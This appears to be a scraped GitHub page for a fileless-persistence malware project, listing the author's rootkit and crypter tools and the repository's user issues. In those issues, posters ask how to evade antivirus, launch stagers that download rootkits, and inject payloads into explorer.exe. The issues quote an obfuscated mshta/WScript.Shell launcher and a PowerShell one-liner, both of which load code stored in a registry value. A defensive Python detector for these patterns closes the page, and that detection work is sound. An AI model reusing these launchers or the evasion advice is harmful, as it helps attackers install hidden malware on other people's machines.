
living-off-the-land's Introduction

r77 Rootkit

Fileless ring 3 rootkit

  • Hides processes, files, network connections, etc.
  • Out of the box, single file installer
  • Fileless persistence, in-memory injection


PEunion

Crypter, binder & downloader

  • In-memory decryption & execution
  • Two-layer execution architecture


Living Off The Land

State of the art fileless attacks

  • Execution without any files
  • Process injection
  • Persistence

... It's technically not even there

living-off-the-land's People

Contributors

bytecode77


living-off-the-land's Issues

Windows Defender detection

Trojan:MSIL/AgentTesla.JMX!MTB

amsi: \Device\HarddiskVolume2\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

mshtA "JAvascRIPt:close(new ActiveXObject('WSc'+'riPT'+'.ShE'+'ll').run('pOwE'+'rSH'+'ELl \"[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\\\"SOFTwArE\\\").GetValue($null)).EntryPoint.Invoke(0,$nuLL)\"',0))"

Windows Defender won't run it, is there any alternative?
You have a lot fewer options trying to run fileless..

Can you explain more about the persistence mechanism?

Hey,

I saw this line in LivingOffTheLand.cpp

"if (!nt_cpp::SetValue(nt_cpp::GetCurrentUserPath() + L"\Software\Microsoft\Windows\CurrentVersion\Run\\0X", nt_cpp::Udc(startupCommand))) return 0;"

And it seems that some data is stored in the registry key in the Run folder. But when I try to find the data, there is indeed a key without a name or data in it. How is it possible? How can we check this value?

Do you think AV can detect this key?

I want to be able to run two instances on the same computer, and I know for sure that the malware can be stored in just another path than Internet Explorer, but how is it possible to start 2 instances at bootup?

Thanks again for your support, enlighten me, friend!

Payload size

Hi. Nice code! But I am just wondering how I am supposed to insert a payload into the registry when it's way over the size limit? In the example I think you used MessageBoxA to call the native API. But what if I want to, let's say, download the bytes and inject them into the explorer.exe process, which means this might include multiple API calls? Please correct me if I am wrong on that. The only solution I can think of is to create more registry keys and store them separately?

Example of UI error

Would you be kind enough to show an example of the UI issues in regedit from the null byte key?

Is it possible to explain more how to set our own executable?

Hi,

I understood the payload project was the project executed, but is it possible to explain more how to set our own project?

Is there a way to just add our executable?

Is there any action or characteristics that might reveal the executable?

BR and excellent work

No longer works in Windows 11?

Seems like this is patched in Windows 11; calling run() from WScript.Shell results in "Access is denied".

Edit: Why do we have to use mshta anyways? Can't we just directly spawn a Powershell process?

Edit 2: Oh look at that it's also issue #11, lol.

Is it possible to make LOTL start 2 exes?

Hi,

Thanks for your work, it's working perfectly for me, but the issue I have right now is that I have one exe that is a stager, and it is supposed to start the rootkit that it downloaded before, but it gets blocked by AV.

It seems quite normal to me, because it was my stager that was starting another exe, but I could not figure out a solution for myself.

Can you help me?

Living off the Land exe doesn't start at bootup in Windows VM

Hi,

I ran the Living off the Land exe, and made sure there is the message "could not display value" when viewing the registry.
When I run the removal tool, it says that it was removed successfully, so it seems to work.

Besides that, I know for sure that the Living off the Land exe did not work because the stager did not run (it's supposed to download the rootkit files).

Did I do something wrong? Does it work on your system?
I use a Windows VM, and I have a hard time trying to just make a program run at bootup, so maybe it comes from there..

BR

Compilation error

My version of Visual Studio 2019 is giving an error when downloading the project. When I downloaded it by git clone, the project gave a compilation error.

Is it possible to use your project to start a dll file?

Hi,

I decided that the form of my malware should be a dll because it's not known by AV. In Windows, we can use the command rundll32 to run it.

I could try to start a batch maybe? I understood that the living off the land executable loaded the content of the payload?

How do I run the payload execution command in PowerShell?

I'm trying to execute the payload that hides inside a registry key but it fails; here's what I'm trying:

powershell -Command [System.Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey("Software\Microsoft\Internet Explorer").GetValue($Null)).EntryPoint.Invoke(0,$Null)

It gives me: You cannot call a method on a null-valued expression.
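Defender-side triage for the launcher pattern quoted in the first and last issues above, as an added example that is not part of the project or of any poster's code: it undoes the 'a'+'b' string splicing, then scores process-creation command lines on independent indicators. The sample lines, indicator names and alert threshold are constructed here and are assumptions, not telemetry.

```python
import re

# Constructed sample process-creation command lines (not real telemetry).
# The first two mirror the launcher and the PowerShell one-liner quoted in
# the issues above; the last two are benign controls.
SAMPLE_CMDLINES = [
    r'''mshta "JAvascRIPt:close(new ActiveXObject('WSc'+'riPT'+'.ShE'+'ll').run('pOwE'+'rSH'+'ELl \"[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\\\"SOFTwArE\\\").GetValue($null)).EntryPoint.Invoke(0,$nuLL)\"',0))"''',
    r'''powershell -Command [System.Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey("Software\Microsoft\Internet Explorer").GetValue($Null)).EntryPoint.Invoke(0,$Null)''',
    r"mshta.exe C:\Program Files\Vendor\setup.hta",
    r"powershell -Command Get-Process | Sort-Object CPU",
]

# 'a'+'b' string splicing, used to keep keywords out of naive substring matches.
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")

# Indicators evaluated against the normalized (case-folded, de-spliced) line.
INDICATORS = {
    "mshta_script_protocol": re.compile(r"\bmshta(?:\.exe)?\b.*\b(?:javascript|vbscript):"),
    "wscript_shell_from_script": re.compile(r"activexobject\(\s*['\"]wscript\.shell['\"]"),
    "assembly_load_from_registry": re.compile(
        r"reflection\.assembly\]::load\(.*registry\]::.*getvalue\(\$null\)"),
    "entrypoint_invoke": re.compile(r"entrypoint\.invoke\("),
}

def normalize(cmdline: str) -> str:
    """Case-fold, then join 'a'+'b' splices repeatedly until nothing changes."""
    text = cmdline.lower()
    while True:
        joined = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
        if joined == text:
            return text
        text = joined

def triage(cmdline: str) -> list[str]:
    """Return the sorted names of every indicator that fires on one line."""
    norm = normalize(cmdline)
    hits = [name for name, rx in INDICATORS.items() if rx.search(norm)]
    if norm != cmdline.lower():  # splices were present and had to be undone
        hits.append("string_concat_obfuscation")
    return sorted(hits)

def is_fileless_launcher(cmdline: str) -> bool:
    """Alert only when two or more independent indicators fire together."""
    return len(triage(cmdline)) >= 2

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(is_fileless_launcher(line), triage(line))
```

The plain mshta.exe invocation of an .hta file and the ordinary PowerShell pipeline score zero, so the alert keys on the combination of script-protocol launch, assembly load from a registry default value and entry-point invocation rather than on mshta or powershell alone.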
